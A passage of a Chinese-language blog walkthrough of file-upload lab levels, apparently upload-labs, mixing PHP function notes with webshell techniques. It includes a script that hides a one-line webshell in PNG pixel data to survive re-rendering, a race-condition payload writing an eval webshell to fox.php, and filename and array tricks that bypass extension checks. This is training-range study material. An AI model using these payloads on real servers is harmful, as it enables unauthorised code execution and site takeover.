<p>#unlink(filename,context)</p>
<p>删除文件。</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>filename</td>
<td>必需。规定要删除的文件。</td>
</tr>
<tr>
<td>context</td>
<td>可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。</td>
</tr>
</tbody></table>
<p>如果成功，该函数返回 TRUE。如果失败，则返回 FALSE。</p>
<p>#srand(seed)</p>
<p>播下随机数发生器种子。</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>seed</td>
<td>可选。用 seed 播下随机数发生器种子。</td>
</tr>
</tbody></table>
<p>自 PHP 4.2.0 起，不再需要用 srand() 或 <a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_math_mt_srand.asp">mt_srand()</a> 函数给随机数发生器播种，现在已自动完成。所以这个函数现在来说应该没用。</p>
<p>#strval( mixed $var)</p>
<p>用于获取变量的字符串值。</p>
<p>$var: 可以是任何标量类型，但不能是数组或对象。</p>
<p>#image__()</p>
<p>将图像输出到浏览器或文件。</p>
<p>imagegif()：       以 GIF 格式将图像输出到浏览器或文件<br>imagejpeg()：    以 JPEG 格式将图像输出到浏览器或文件<br>imagepng()：     以 PNG 格式将图像输出到浏览器或文件<br>imagewbmp()：以 WBMP 格式将图像输出到浏览器或文件</p>
<p>#因为重新渲染了图片所以我们写的一句话木马会消失。</p>
<p>利用大佬写的php脚本制作一张图片马</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token variable">$p</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token number">0xa3</span><span class="token punctuation">,</span> <span class="token number">0x9f</span><span class="token punctuation">,</span> <span class="token number">0x67</span><span class="token punctuation">,</span> <span class="token number">0xf7</span><span class="token punctuation">,</span> <span class="token number">0x0e</span><span class="token punctuation">,</span> <span class="token number">0x93</span><span class="token punctuation">,</span> <span class="token number">0x1b</span><span class="token punctuation">,</span> <span class="token number">0x23</span><span class="token punctuation">,</span>
           <span class="token number">0xbe</span><span class="token punctuation">,</span> <span class="token number">0x2c</span><span class="token punctuation">,</span> <span class="token number">0x8a</span><span class="token punctuation">,</span> <span class="token number">0xd0</span><span class="token punctuation">,</span> <span class="token number">0x80</span><span class="token punctuation">,</span> <span class="token number">0xf9</span><span class="token punctuation">,</span> <span class="token number">0xe1</span><span class="token punctuation">,</span> <span class="token number">0xae</span><span class="token punctuation">,</span>
           <span class="token number">0x22</span><span class="token punctuation">,</span> <span class="token number">0xf6</span><span class="token punctuation">,</span> <span class="token number">0xd9</span><span class="token punctuation">,</span> <span class="token number">0x43</span><span class="token punctuation">,</span> <span class="token number">0x5d</span><span class="token punctuation">,</span> <span class="token number">0xfb</span><span class="token punctuation">,</span> <span class="token number">0xae</span><span class="token punctuation">,</span> <span class="token number">0xcc</span><span class="token punctuation">,</span>
           <span class="token number">0x5a</span><span class="token punctuation">,</span> <span class="token number">0x01</span><span class="token punctuation">,</span> <span class="token number">0xdc</span><span class="token punctuation">,</span> <span class="token number">0x5a</span><span class="token punctuation">,</span> <span class="token number">0x01</span><span class="token punctuation">,</span> <span class="token number">0xdc</span><span class="token punctuation">,</span> <span class="token number">0xa3</span><span class="token punctuation">,</span> <span class="token number">0x9f</span><span class="token punctuation">,</span>
           <span class="token number">0x67</span><span class="token punctuation">,</span> <span class="token number">0xa5</span><span class="token punctuation">,</span> <span class="token number">0xbe</span><span class="token punctuation">,</span> <span class="token number">0x5f</span><span class="token punctuation">,</span> <span class="token number">0x76</span><span class="token punctuation">,</span> <span class="token number">0x74</span><span class="token punctuation">,</span> <span class="token number">0x5a</span><span class="token punctuation">,</span> <span class="token number">0x4c</span><span class="token punctuation">,</span>
           <span class="token number">0xa1</span><span class="token punctuation">,</span> <span class="token number">0x3f</span><span class="token punctuation">,</span> <span class="token number">0x7a</span><span class="token punctuation">,</span> <span class="token number">0xbf</span><span class="token punctuation">,</span> <span class="token number">0x30</span><span class="token punctuation">,</span> <span class="token number">0x6b</span><span class="token punctuation">,</span> <span class="token number">0x88</span><span class="token punctuation">,</span> <span class="token number">0x2d</span><span class="token punctuation">,</span>
           <span class="token number">0x60</span><span class="token punctuation">,</span> <span class="token number">0x65</span><span class="token punctuation">,</span> <span class="token number">0x7d</span><span class="token punctuation">,</span> <span class="token number">0x52</span><span class="token punctuation">,</span> <span class="token number">0x9d</span><span class="token punctuation">,</span> <span class="token number">0xad</span><span class="token punctuation">,</span> <span class="token number">0x88</span><span class="token punctuation">,</span> <span class="token number">0xa1</span><span class="token punctuation">,</span>
           <span class="token number">0x66</span><span class="token punctuation">,</span> <span class="token number">0x44</span><span class="token punctuation">,</span> <span class="token number">0x50</span><span class="token punctuation">,</span> <span class="token number">0x33</span><span class="token punctuation">)</span><span class="token punctuation">;</span>



<span class="token variable">$img</span> <span class="token operator">=</span> <span class="token function">imagecreatetruecolor</span><span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">,</span> <span class="token number">32</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token variable">$y</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable">$y</span> <span class="token operator">&lt;</span> <span class="token function">sizeof</span><span class="token punctuation">(</span><span class="token variable">$p</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable">$y</span> <span class="token operator">+</span><span class="token operator">=</span> <span class="token number">3</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
   <span class="token variable">$r</span> <span class="token operator">=</span> <span class="token variable">$p</span><span class="token punctuation">[</span><span class="token variable">$y</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
   <span class="token variable">$g</span> <span class="token operator">=</span> <span class="token variable">$p</span><span class="token punctuation">[</span><span class="token variable">$y</span><span class="token operator">+</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
   <span class="token variable">$b</span> <span class="token operator">=</span> <span class="token variable">$p</span><span class="token punctuation">[</span><span class="token variable">$y</span><span class="token operator">+</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
   <span class="token variable">$color</span> <span class="token operator">=</span> <span class="token function">imagecolorallocate</span><span class="token punctuation">(</span><span class="token variable">$img</span><span class="token punctuation">,</span> <span class="token variable">$r</span><span class="token punctuation">,</span> <span class="token variable">$g</span><span class="token punctuation">,</span> <span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token function">imagesetpixel</span><span class="token punctuation">(</span><span class="token variable">$img</span><span class="token punctuation">,</span> <span class="token function">round</span><span class="token punctuation">(</span><span class="token variable">$y</span> <span class="token operator">/</span> <span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token variable">$color</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

<span class="token function">imagepng</span><span class="token punctuation">(</span><span class="token variable">$img</span><span class="token punctuation">,</span><span class="token string">'./1.png'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span></code></pre>
<p>再准备一张普通的png图片。在该目录下输入命令 php pass17.php pass17.png</p>
<p>前面是脚本的名字，后面是png图片保存的名字。然后就会生存fox.png</p>
<p>上传，在目录下打开发现一句话木马没有被改变。这个一句话木马需要同时传参GET参数0和POST参数1才行</p>
<p>用菜刀连接file=./upload/1234.png&amp;0=assert  密码是1 就可以了</p>
<p>注：</p>
<p>#这里不能用eval函数 </p>
<p>#只有php.ini中开启short_open_tag 才可以用&lt;?  代替 &lt;?php  , 用&lt;?= 代替 &lt;? echo</p>
<p>#在PHP7.1版本以后，assert()默认不再可以执行代码 就像eval一样。所以说 assert也和eval一样不能被可变函数调用。</p>
<h3 id="0x18"><a href="#0x18" class="headerlink" title="#0x18"></a>#0x18</h3><p>代码审计</p>
<pre class=" language-php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">move_uploaded_file</span><span class="token punctuation">(</span><span class="token variable">$temp_file</span><span class="token punctuation">,</span> <span class="token variable">$upload_file</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">in_array</span><span class="token punctuation">(</span><span class="token variable">$file_ext</span><span class="token punctuation">,</span><span class="token variable">$ext_arr</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
             <span class="token variable">$img_path</span> <span class="token operator">=</span> <span class="token constant">UPLOAD_PATH</span> <span class="token punctuation">.</span> <span class="token string">'/'</span><span class="token punctuation">.</span> <span class="token function">rand</span><span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">,</span> <span class="token number">99</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">date</span><span class="token punctuation">(</span><span class="token string">"YmdHis"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">"."</span><span class="token punctuation">.</span><span class="token variable">$file_ext</span><span class="token punctuation">;</span>
             <span class="token function">rename</span><span class="token punctuation">(</span><span class="token variable">$upload_file</span><span class="token punctuation">,</span> <span class="token variable">$img_path</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
             <span class="token variable">$is_upload</span> <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
        <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;else&amp;#123;</span>
            <span class="token variable">$msg</span> <span class="token operator">=</span> <span class="token string">"只允许上传.jpg|.png|.gif类型文件！"</span><span class="token punctuation">;</span>
            <span class="token function">unlink</span><span class="token punctuation">(</span><span class="token variable">$upload_file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;else&amp;#123;</span>
        <span class="token variable">$msg</span> <span class="token operator">=</span> <span class="token string">'上传出错！'</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span></code></pre>
<p>这里是先把文件存进服务器里，再进行文件类型的判断，正确改名上传。错误则删除。</p>
<p>所以可以利用它判断的时间差，来上传木马文件。</p>
<pre><code>&lt;?php 
fputs(fopen(&#39;fox.php&#39;,&#39;w+&#39;),&#39;&lt;?php eval($_POST[fox]);?&gt;&#39;);
?&gt;</code></pre>
<p>用burp截住包,我们需要的不断重放这个数据包，所以选择没有负载。线程设高一点，然后开始攻击。不断刷新页面即可，就会在目录下生存fox.php的木马文件。</p>
<h3 id="0x19"><a href="#0x19" class="headerlink" title="#0x19"></a>#0x19</h3><p>还没学完面向对象，下次再补！</p>
<h3 id="0x20"><a href="#0x20" class="headerlink" title="#0x20"></a>#0x20</h3><p>函数知识补充：</p>
<p>#pathinfo(path,options) </p>
<p>以数组的形式返回关于文件路径的信息。</p>
<p>返回的数组元素如下：</p>
<pre class=" language-php"><code class="language-php"><span class="token punctuation">[</span>dirname<span class="token punctuation">]</span><span class="token punctuation">:</span> 目录路径
<span class="token punctuation">[</span>basename<span class="token punctuation">]</span><span class="token punctuation">:</span> 文件名
<span class="token punctuation">[</span>extension<span class="token punctuation">]</span><span class="token punctuation">:</span> 文件后缀名
<span class="token punctuation">[</span>filename<span class="token punctuation">]</span><span class="token punctuation">:</span> 不包含后缀的文件名</code></pre>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>path</td>
<td>必需。规定要检查的路径。</td>
</tr>
<tr>
<td>options</td>
<td>可选。规定要返回的数组元素。默认是 all。可能的值：  PATHINFO_DIRNAME - 只返回 dirname     PATHINFO_BASENAME - 只返回 basename     PATHINFO_EXTENSION - 只返回 extension PATHINFO_FILENAME - 只返回 filename</td>
</tr>
</tbody></table>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span> 
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token function">pathinfo</span><span class="token punctuation">(</span><span class="token string">"/testweb/test.txt"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token delimiter">?></span></code></pre>
<pre class=" language-php"><code class="language-php"><span class="token keyword">Array</span>
<span class="token punctuation">(</span>
    <span class="token punctuation">[</span>dirname<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token operator">/</span>testweb
    <span class="token punctuation">[</span>basename<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> test<span class="token punctuation">.</span>txt
    <span class="token punctuation">[</span>extension<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> txt
    <span class="token punctuation">[</span>filename<span class="token punctuation">]</span> <span class="token operator">=</span><span class="token operator">></span> test
<span class="token punctuation">)</span></code></pre>
<p>直接代码审计就可绕过。利用前面的思想用fox.php. .绕过。或许还有其他方法，自己发散思维。</p>
<h3 id="0x21"><a href="#0x21" class="headerlink" title="#0x21"></a>#0x21</h3><p>函数知识补充：</p>
<p>#end(array)</p>
<p>将内部指针指向数组中的最后一个元素，并输出。</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td><em>array</em></td>
<td>必需。规定要使用的数组。</td>
</tr>
</tbody></table>
<p>相关的方法：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-array-current.html">current()</a> - 返回数组中的当前元素的值。</li>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-array-next.html">next()</a> - 将内部指针指向数组中的下一个元素，并输出。</li>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-array-prev.html">prev()</a> - 将内部指针指向数组中的上一个元素，并输出。</li>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-array-reset.html">reset()</a> - 将内部指针指向数组中的第一个元素，并输出。</li>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-array-each.html">each()</a> - 返回当前元素的键名和键值，并将内部指针向前移动。</li>
</ul>
<p>#reset(array)</p>
<p>将内部指针指向数组中的第一个元素，并输出</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td><em>array</em></td>
<td>必需。规定要使用的数组。</td>
</tr>
</tbody></table>
<p>这关是修改save_name将其改成一个数组</p>
<p><img src="/images/16.png"></p>
<p>因为先验证MIME类型所以需要修改Conent-Type</p>
<p>然后利用数组方式来绕过后面的验证。</p>
<p>注：</p>
<p>#php后面要加/ 不然会生成fox.php.jpg</p>
<p>#jpg的位置必须&gt;=2即④的位置</p>
<p>#jpg可以换成gif或者png，但前面不能加其他的东西</p>
<p>理解不了，可以自己把每个步骤echo出来观察变化。（我是这样做的，帮助自己理解）</p>
<p>不足之处请见谅！作者是菜鸟。。。</p>

    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a target="_blank" rel="noopener" href="https://github.com/klugjo">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2022/03/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-NTLM-Relay%E6%94%BB%E5%87%BB/">内网渗透篇-NTLM Relay攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/03/06/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-%E9%9D%9E%E7%BA%A6%E6%9D%9F-%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB/">内网渗透篇-非约束/约束委派攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/02/24/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-%E9%9A%A7%E9%81%93%E4%BB%A3%E7%90%86/">内网渗透篇-隧道代理</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/02/20/Thinkphp6-0-12LTS%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">Thinkphp6.0.12LTS反序列化漏洞分析</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a target="_blank" rel="noopener" href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>